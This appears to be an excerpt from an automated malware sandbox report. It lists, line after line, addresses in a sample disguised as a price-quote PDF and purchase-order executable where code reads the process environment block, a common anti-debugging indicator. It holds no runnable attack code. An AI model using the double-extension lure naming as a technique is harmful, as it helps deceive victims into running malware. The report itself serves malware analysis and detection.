            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C720 mov eax, dword ptr fs:[00000030h]7_2_01B0C720
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C720 mov eax, dword ptr fs:[00000030h]7_2_01B0C720
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B00710 mov eax, dword ptr fs:[00000030h]7_2_01B00710
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C700 mov eax, dword ptr fs:[00000030h]7_2_01B0C700
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD0710 mov eax, dword ptr fs:[00000030h]7_2_01AD0710
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD8770 mov eax, dword ptr fs:[00000030h]7_2_01AD8770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B54755 mov eax, dword ptr fs:[00000030h]7_2_01B54755
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12750 mov eax, dword ptr fs:[00000030h]7_2_01B12750
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12750 mov eax, dword ptr fs:[00000030h]7_2_01B12750
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5E75D mov eax, dword ptr fs:[00000030h]7_2_01B5E75D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD0750 mov eax, dword ptr fs:[00000030h]7_2_01AD0750
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0674D mov esi, dword ptr fs:[00000030h]7_2_01B0674D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0674D mov eax, dword ptr fs:[00000030h]7_2_01B0674D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0674D mov eax, dword ptr fs:[00000030h]7_2_01B0674D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B066B0 mov eax, dword ptr fs:[00000030h]7_2_01B066B0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C6A6 mov eax, dword ptr fs:[00000030h]7_2_01B0C6A6
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD4690 mov eax, dword ptr fs:[00000030h]7_2_01AD4690
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD4690 mov eax, dword ptr fs:[00000030h]7_2_01AD4690
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B506F1 mov eax, dword ptr fs:[00000030h]7_2_01B506F1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B506F1 mov eax, dword ptr fs:[00000030h]7_2_01B506F1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E6F2 mov eax, dword ptr fs:[00000030h]7_2_01B4E6F2
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E6F2 mov eax, dword ptr fs:[00000030h]7_2_01B4E6F2
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E6F2 mov eax, dword ptr fs:[00000030h]7_2_01B4E6F2
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E6F2 mov eax, dword ptr fs:[00000030h]7_2_01B4E6F2
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A6C7 mov ebx, dword ptr fs:[00000030h]7_2_01B0A6C7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A6C7 mov eax, dword ptr fs:[00000030h]7_2_01B0A6C7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD262C mov eax, dword ptr fs:[00000030h]7_2_01AD262C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEE627 mov eax, dword ptr fs:[00000030h]7_2_01AEE627
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B06620 mov eax, dword ptr fs:[00000030h]7_2_01B06620
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B08620 mov eax, dword ptr fs:[00000030h]7_2_01B08620
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h]7_2_01AE260B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h]7_2_01AE260B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h]7_2_01AE260B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h]7_2_01AE260B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h]7_2_01AE260B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h]7_2_01AE260B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h]7_2_01AE260B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12619 mov eax, dword ptr fs:[00000030h]7_2_01B12619
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E609 mov eax, dword ptr fs:[00000030h]7_2_01B4E609
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B02674 mov eax, dword ptr fs:[00000030h]7_2_01B02674
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A660 mov eax, dword ptr fs:[00000030h]7_2_01B0A660
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A660 mov eax, dword ptr fs:[00000030h]7_2_01B0A660
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9866E mov eax, dword ptr fs:[00000030h]7_2_01B9866E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9866E mov eax, dword ptr fs:[00000030h]7_2_01B9866E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEC640 mov eax, dword ptr fs:[00000030h]7_2_01AEC640
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD09AD mov eax, dword ptr fs:[00000030h]7_2_01AD09AD
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD09AD mov eax, dword ptr fs:[00000030h]7_2_01AD09AD
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B589B3 mov esi, dword ptr fs:[00000030h]7_2_01B589B3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B589B3 mov eax, dword ptr fs:[00000030h]7_2_01B589B3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B589B3 mov eax, dword ptr fs:[00000030h]7_2_01B589B3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h]7_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h]7_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h]7_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h]7_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h]7_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h]7_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h]7_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h]7_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h]7_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h]7_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h]7_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h]7_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h]7_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B029F9 mov eax, dword ptr fs:[00000030h]7_2_01B029F9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B029F9 mov eax, dword ptr fs:[00000030h]7_2_01B029F9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5E9E0 mov eax, dword ptr fs:[00000030h]7_2_01B5E9E0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B049D0 mov eax, dword ptr fs:[00000030h]7_2_01B049D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9A9D3 mov eax, dword ptr fs:[00000030h]7_2_01B9A9D3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B669C0 mov eax, dword ptr fs:[00000030h]7_2_01B669C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA9D0 mov eax, dword ptr fs:[00000030h]7_2_01ADA9D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA9D0 mov eax, dword ptr fs:[00000030h]7_2_01ADA9D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA9D0 mov eax, dword ptr fs:[00000030h]7_2_01ADA9D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA9D0 mov eax, dword ptr fs:[00000030h]7_2_01ADA9D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA9D0 mov eax, dword ptr fs:[00000030h]7_2_01ADA9D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA9D0 mov eax, dword ptr fs:[00000030h]7_2_01ADA9D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B6892B mov eax, dword ptr fs:[00000030h]7_2_01B6892B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5892A mov eax, dword ptr fs:[00000030h]7_2_01B5892A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5C912 mov eax, dword ptr fs:[00000030h]7_2_01B5C912
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AC8918 mov eax, dword ptr fs:[00000030h]7_2_01AC8918
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AC8918 mov eax, dword ptr fs:[00000030h]7_2_01AC8918
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E908 mov eax, dword ptr fs:[00000030h]7_2_01B4E908
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E908 mov eax, dword ptr fs:[00000030h]7_2_01B4E908
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5C97C mov eax, dword ptr fs:[00000030h]7_2_01B5C97C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF6962 mov eax, dword ptr fs:[00000030h]7_2_01AF6962
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF6962 mov eax, dword ptr fs:[00000030h]7_2_01AF6962
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF6962 mov eax, dword ptr fs:[00000030h]7_2_01AF6962
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B74978 mov eax, dword ptr fs:[00000030h]7_2_01B74978
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B74978 mov eax, dword ptr fs:[00000030h]7_2_01B74978
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B1096E mov eax, dword ptr fs:[00000030h]7_2_01B1096E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B1096E mov edx, dword ptr fs:[00000030h]7_2_01B1096E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B1096E mov eax, dword ptr fs:[00000030h]7_2_01B1096E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B50946 mov eax, dword ptr fs:[00000030h]7_2_01B50946
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4940 mov eax, dword ptr fs:[00000030h]7_2_01BA4940
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5C89D mov eax, dword ptr fs:[00000030h]7_2_01B5C89D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD0887 mov eax, dword ptr fs:[00000030h]7_2_01AD0887
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C8F9 mov eax, dword ptr fs:[00000030h]7_2_01B0C8F9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C8F9 mov eax, dword ptr fs:[00000030h]7_2_01B0C8F9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9A8E4 mov eax, dword ptr fs:[00000030h]7_2_01B9A8E4
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE8C0 mov eax, dword ptr fs:[00000030h]7_2_01AFE8C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA08C0 mov eax, dword ptr fs:[00000030h]7_2_01BA08C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A830 mov eax, dword ptr fs:[00000030h]7_2_01B0A830
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7483A mov eax, dword ptr fs:[00000030h]7_2_01B7483A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7483A mov eax, dword ptr fs:[00000030h]7_2_01B7483A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF2835 mov eax, dword ptr fs:[00000030h]7_2_01AF2835
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF2835 mov eax, dword ptr fs:[00000030h]7_2_01AF2835
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF2835 mov eax, dword ptr fs:[00000030h]7_2_01AF2835
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF2835 mov ecx, dword ptr fs:[00000030h]7_2_01AF2835
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF2835 mov eax, dword ptr fs:[00000030h]7_2_01AF2835
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF2835 mov eax, dword ptr fs:[00000030h]7_2_01AF2835
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5C810 mov eax, dword ptr fs:[00000030h]7_2_01B5C810
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B66870 mov eax, dword ptr fs:[00000030h]7_2_01B66870
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B66870 mov eax, dword ptr fs:[00000030h]7_2_01B66870
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5E872 mov eax, dword ptr fs:[00000030h]7_2_01B5E872
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5E872 mov eax, dword ptr fs:[00000030h]7_2_01B5E872
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B00854 mov eax, dword ptr fs:[00000030h]7_2_01B00854
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE2840 mov ecx, dword ptr fs:[00000030h]7_2_01AE2840
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD4859 mov eax, dword ptr fs:[00000030h]7_2_01AD4859
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD4859 mov eax, dword ptr fs:[00000030h]7_2_01AD4859
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B84BB0 mov eax, dword ptr fs:[00000030h]7_2_01B84BB0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B84BB0 mov eax, dword ptr fs:[00000030h]7_2_01B84BB0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0BBE mov eax, dword ptr fs:[00000030h]7_2_01AE0BBE
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0BBE mov eax, dword ptr fs:[00000030h]7_2_01AE0BBE
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5CBF0 mov eax, dword ptr fs:[00000030h]7_2_01B5CBF0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFEBFC mov eax, dword ptr fs:[00000030h]7_2_01AFEBFC
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD8BF0 mov eax, dword ptr fs:[00000030h]7_2_01AD8BF0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD8BF0 mov eax, dword ptr fs:[00000030h]7_2_01AD8BF0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD8BF0 mov eax, dword ptr fs:[00000030h]7_2_01AD8BF0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD0BCD mov eax, dword ptr fs:[00000030h]7_2_01AD0BCD
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD0BCD mov eax, dword ptr fs:[00000030h]7_2_01AD0BCD
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD0BCD mov eax, dword ptr fs:[00000030h]7_2_01AD0BCD
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF0BCB mov eax, dword ptr fs:[00000030h]7_2_01AF0BCB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF0BCB mov eax, dword ptr fs:[00000030h]7_2_01AF0BCB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF0BCB mov eax, dword ptr fs:[00000030h]7_2_01AF0BCB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7EBD0 mov eax, dword ptr fs:[00000030h]7_2_01B7EBD0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFEB20 mov eax, dword ptr fs:[00000030h]7_2_01AFEB20
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFEB20 mov eax, dword ptr fs:[00000030h]7_2_01AFEB20
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B98B28 mov eax, dword ptr fs:[00000030h]7_2_01B98B28
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B98B28 mov eax, dword ptr fs:[00000030h]7_2_01B98B28
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h]7_2_01B4EB1D
